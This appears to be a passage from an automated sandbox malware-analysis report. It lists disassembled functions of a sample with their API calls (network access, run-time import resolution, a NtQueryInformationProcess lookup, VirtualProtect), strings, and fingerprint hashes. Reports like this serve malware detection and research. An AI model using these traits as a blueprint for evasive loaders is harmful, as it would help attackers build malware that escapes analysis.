Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

ios_base::failbit set, xrefs: 0040C510
F(@, xrefs: 0040C547

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0041DA0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61

Strings

pContext, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0253B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02512AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02512AAD,00000000), ref: 0253B187
GetLastError.KERNEL32 ref: 0253B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02512AAD,00000000), ref: 0253B1F0

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 577262e9f76e9423f7cf0c358cdb5dc8d86c202f30bf45a44ced471121f1b1cb
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 1741C631604206AFDB239FA5C844B7EBFA5FF41719F145669F859A71A0DB30CA01CB68

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: BB02.tmp.exePID: 7928, Parent PID: 7784COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	6.8%
Signature Coverage:	19.8%
Total number of Nodes:	1543
Total number of Limit Nodes:	38

Executed Functions

Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0040602F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163

Strings

", xrefs: 004065C7, 004066B5
------, xrefs: 00406289, 004062B6, 0040652E, 0040661F

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8

Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6

Strings

", xrefs: 00405154, 00405242
------, xrefs: 00404E0C, 00404E39, 004050BB, 004051AC

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
LdrInitializeThunk.NTDLL ref: 00404A4F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040498F, 00404996, 0040499D, 004049A4, 004049AB, 004049CA, 004049D4, 004049DB, 004049E2, 004049E9, 004049F0, 004049FB, 00404A02, 00404A09, 00404A10, 00404A26, 00404A2D, 00404A34, 00404A3B, 00404A42, 00404A63, 00404A75, 00404A7C, 00404A83, 00404A8A, 00404A9A, 00404AA1, 00404AA8, 00404AAF, 00404AB6

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2971326882-3329630956
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

Function 004263C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00A3A878), ref: 00426419
GetProcAddress.KERNEL32(74DD0000,00A3A890), ref: 00426432
GetProcAddress.KERNEL32(74DD0000,00A3A8A8), ref: 0042644A
GetProcAddress.KERNEL32(74DD0000,00A3A8D8), ref: 00426462
GetProcAddress.KERNEL32(74DD0000,00A15E10), ref: 0042647B
GetProcAddress.KERNEL32(74DD0000,00A14208), ref: 00426493
GetProcAddress.KERNEL32(74DD0000,00A141A8), ref: 004264AB
GetProcAddress.KERNEL32(74DD0000,00A3A908), ref: 004264C4
GetProcAddress.KERNEL32(74DD0000,00A3A8F0), ref: 004264DC
GetProcAddress.KERNEL32(74DD0000,00A3A920), ref: 004264F4
GetProcAddress.KERNEL32(74DD0000,00A3A938), ref: 0042650D
GetProcAddress.KERNEL32(74DD0000,00A14088), ref: 00426525
GetProcAddress.KERNEL32(74DD0000,00A3A668), ref: 0042653D
GetProcAddress.KERNEL32(74DD0000,00A3A818), ref: 00426556
GetProcAddress.KERNEL32(74DD0000,00A140E8), ref: 0042656E
GetProcAddress.KERNEL32(74DD0000,00A3A7D0), ref: 00426586
GetProcAddress.KERNEL32(74DD0000,00A3A638), ref: 0042659F
GetProcAddress.KERNEL32(74DD0000,00A14188), ref: 004265B7
GetProcAddress.KERNEL32(74DD0000,00A3A728), ref: 004265CF
GetProcAddress.KERNEL32(74DD0000,00A14288), ref: 004265E8
LoadLibraryA.KERNEL32(00A3A830,?,?,?,00421BE3), ref: 004265F9
LoadLibraryA.KERNEL32(00A3A7E8,?,?,?,00421BE3), ref: 0042660B
LoadLibraryA.KERNEL32(00A3A6C8,?,?,?,00421BE3), ref: 0042661D
LoadLibraryA.KERNEL32(00A3A6F8,?,?,?,00421BE3), ref: 0042662E
LoadLibraryA.KERNEL32(00A3A6B0,?,?,?,00421BE3), ref: 00426640
GetProcAddress.KERNEL32(75A70000,00A3A6E0), ref: 0042665D
GetProcAddress.KERNEL32(75290000,00A3A7B8), ref: 00426679
GetProcAddress.KERNEL32(75290000,00A3A680), ref: 00426691
GetProcAddress.KERNEL32(75BD0000,00A3A710), ref: 004266AD
GetProcAddress.KERNEL32(75450000,00A141C8), ref: 004266C9
GetProcAddress.KERNEL32(76E90000,00A15E20), ref: 004266E5
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004266FC

Strings

NtQueryInformationProcess, xrefs: 004266F1

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
